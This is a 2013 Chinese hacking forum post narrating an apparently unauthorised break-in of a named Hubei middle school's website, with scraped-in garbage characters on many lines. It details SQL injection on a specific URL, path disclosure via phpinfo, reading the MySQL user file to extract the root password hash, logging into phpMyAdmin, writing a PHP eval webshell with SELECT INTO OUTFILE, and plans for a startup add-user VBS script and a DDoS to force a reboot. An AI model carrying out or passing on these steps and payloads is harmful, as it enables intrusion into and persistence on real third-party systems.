找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2737|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
: C% D/ F; \( s! ^1 g发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!, d7 t( f2 f! p4 i
8 x( V1 o! Z& n
/ k7 z( z3 \1 L
/ u' i: d$ B6 G2 t. E
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
1 L2 g* B* e; g( R8 ^( j7 ?5 _2 R/ `$ P: U& F9 s5 {
那么想可以直接写入shell ,getshell有几个条件:
* ]  C) A' X1 W& j5 B" M* _$ j
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF7 E' H8 L- Z8 G( n  h

- ]  b2 B/ r2 k# r( c3 n) G8 m试着爆绝对路径:
% B. G# w1 k: R6 w1./phpMyAdmin/index.php?lang[]=1  7 q% ?; \- Z  G: a, H( m* O
2./phpMyAdmin/phpinfo.php  
6 K1 {4 B  G5 m$ K6 Z" n3./load_file()  7 [: A6 G- c$ `8 _+ |/ N; C1 t/ C
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
7 J$ v  U8 w0 P8 Y+ m5./phpmyadmin/libraries/select_lang.lib.php  
; h: g; h& L1 L6./phpmyadmin/libraries/lect_lang.lib.php  
5 G  l4 K) m! k( k. L7./phpmyadmin/libraries/mcrypt.lib.php   9 p, V; F& A8 I; ^# K  [  Y$ x
8./phpmyadmin/libraries/export/xls.php  
7 _; r: [& S0 v& T# D: M/ `) A
2 }% b$ v+ |/ V2 V) x1 K1 z: W6 a. N5 z均不行...........................
& V: t+ d6 {4 X+ y
# ]3 u; S; k. X) m, O御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
) S+ O* f6 B# V) |: K$ h( m0 L
( D3 n) q( d3 }) h% N) K权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 5 T6 M* U7 l' n) s% P, e' `
' y1 @; l& _0 `6 b- u5 K
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败  j0 m3 [; m' m; ^2 h) I
' O# H9 P- W4 n7 W# m
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........3 k9 }1 K  b: C# V+ u

4 O  p  J; v# N9 z. z9 ?想想root还可以读,读到root密码进phpmyadmin 也可以拿shell % x+ n' f& I5 j9 m7 S: N3 R

8 F4 D8 v# u  C  F0 Jhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini * P0 d" T$ C5 F  y0 g. ]
5 u! m4 s1 F0 T4 N$ U0 w
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
7 i& r( S' y, T- m; m" F2 F7 n# c( z0 J: G5 L3 I  j
成功读到root密码:# K3 w2 ~, L& V- [5 ~4 `

6 b/ X* N! A3 J$ A$ A17---- r(0072)
) B( A6 W1 L. A% {  s0 D: E18---- o(006f)8 d2 n2 q3 ~" o+ T
19---- o(006f)
2 I( L8 h, m, M7 n9 `20---- t(0074)
1 |  z6 B% E5 |9 H  j. x6 f7 A$ G21---- *(002a)
# n9 U0 l8 h# q% H3 u5 r# }22---- 8(0038)
; k* l) z: }& N1 M$ j3 M' C23---- 2(0032)
5 j# E- w+ ]8 o2 p24---- E(0045)
7 f6 O' F8 ~) m/ m4 E& j3 A25---- 1(0031)# `; ~. M5 q* t2 N6 h' K0 |
26---- C(0043)
" H! g) H0 u! H4 x; R8 r; C27---- 5(0035)
9 N5 L) x9 g9 H* D, x28---- 8(0038)
+ q5 g; o" v2 f6 z9 J1 ]& Q3 b29---- 2(0032)
( K+ M$ \- s4 [$ K30---- 8(0038)3 G6 o, b# a9 |- F! q" ^" M
31---- A(0041)
1 ^3 [7 z& p. Z+ J1 i32---- 9(0039)# S1 ?# W0 {5 n$ m* W) [; t
33---- B(0042)2 L: i7 o$ _0 n! D0 X4 _& m* x
34---- 5(0035)
- A/ _4 b9 g) x8 x( k5 u5 A  `$ w35---- 4(0034)2 {9 ^. v2 j! {! f9 m. P
36---- 8(0038)
; r& \1 f. B# ]# I$ l! \) C37---- 6(0036)
! C1 Q; `8 v* \$ ]5 O/ a- c5 y38---- 4(0034)# K: o# J* [( u7 j
39---- 9(0039)+ I, i( r5 V% `& z% J/ b
40---- 1(0031)  U. B2 Q' u/ V' Q; \
41---- 1(0031); _" ^9 h  a' N7 k
42---- 5(0035)
; Q( ?/ Q6 @, [& |0 o0 Z0 }43---- 3(0033)
# j/ a+ Z& b3 N44---- 5(0035)0 f# [3 o% ?! M' R/ j* j! T3 O
45---- 9(0039)
9 \2 v0 r% ]. [& k- g+ q- G46---- 8(0038)9 q1 [1 I8 U/ u, Z- i
47---- F(0046)& A3 E$ f% q, {9 M4 x
48---- F(0046)
7 P) F0 H: o# T" \. e49---- 4(0034)" q3 g3 P: Q" H8 P$ M
50---- F(0046)4 q0 k6 X! e0 T
51---- 0(0030)$ \5 H2 ?$ t2 v
52---- 3(0033)
0 i' Y3 q: z# m4 E$ s5 u" R53---- 2(0032)
$ ]# |" p: g" h, s0 @" l. ]54---- A(0041)4 F' \8 j& p3 k* a5 h1 Q, I+ k
55---- 4(0034)
! m, M* {; N# G% }56---- A(0041)
; o2 d$ [8 k$ }) K1 q9 \# s57---- B(0042)# X2 q1 A4 C$ z$ i8 x
58---- *(0044)' ]& E, \' w: ^6 l0 w3 s6 D3 W
59---- *(0035)
4 c  p( u5 G, T60---- *(0041)/ ^- ~7 T' D. q; z7 k  B
61---- *0032)( S& C. N5 ^9 U7 h+ P5 ^# B2 r
  |, f' y$ A9 W: \( \
解密后成功登陆phpmyamin
6 @4 a9 w8 |, A6 A( o. s                          0 C- a/ Q* W  n) ^' w0 y/ I, T

+ y" u/ d  I3 b* ]                             5 R2 M, b) q5 \/ H$ `

2 k' C1 M) s; ]6 h6 H找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
9 w) D; f% a8 D8 j8 U0 f9 M! o' V" T( r8 X8 Y
成功执行,拿下shell,菜刀连接:
: o" M6 @8 K8 B0 t0 q. d% K& d
3 n  L! g+ |, k( b服务器不支持asp,aspx,php提权无果...................
# R* H! w& z& a- ]" ?
! Q5 C" b1 V6 `- x* X% ]6 p但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
5 o- H0 ]% E8 F
服务器上已经有个隐藏帐号了
8 N9 |; i* t. J3 G
别名     administrators
+ T3 O, A$ w# p9 B7 [注释     管理员对计算机/域有不受限制的完全访问权

" }( \, y+ f- g% N2 h7 B5 b
成员

$ |1 G6 c! @/ |1 ^& ?( T/ B3 m
-------------------------------------------------------------------------------
5 y9 _/ C- l8 v" zadmin2 g0 v) t5 O, t6 X5 O% q2 U
Administrator1 |- q; ^5 W& P; C! R' O, n6 A
slipper$& b' g+ r6 [* p. ~
sqluser
1 w! L* ?2 Y! F" z命令成功完成。 ; e+ F! R$ \( q+ H& s0 M- S2 x: ]

$ }( i  ^$ ^7 f9 q3 `8 [  I, ~; N服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。5 K% b$ _2 u# G/ M; f8 _
* ^) v" T- h& U9 n$ o* s
ddos服务器重启,不然就只能坐等服务器重启了...............................* i! s3 `3 H9 W6 D3 d

( [- r' e% p: Z% v      
2 z2 O6 }6 X' ~

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表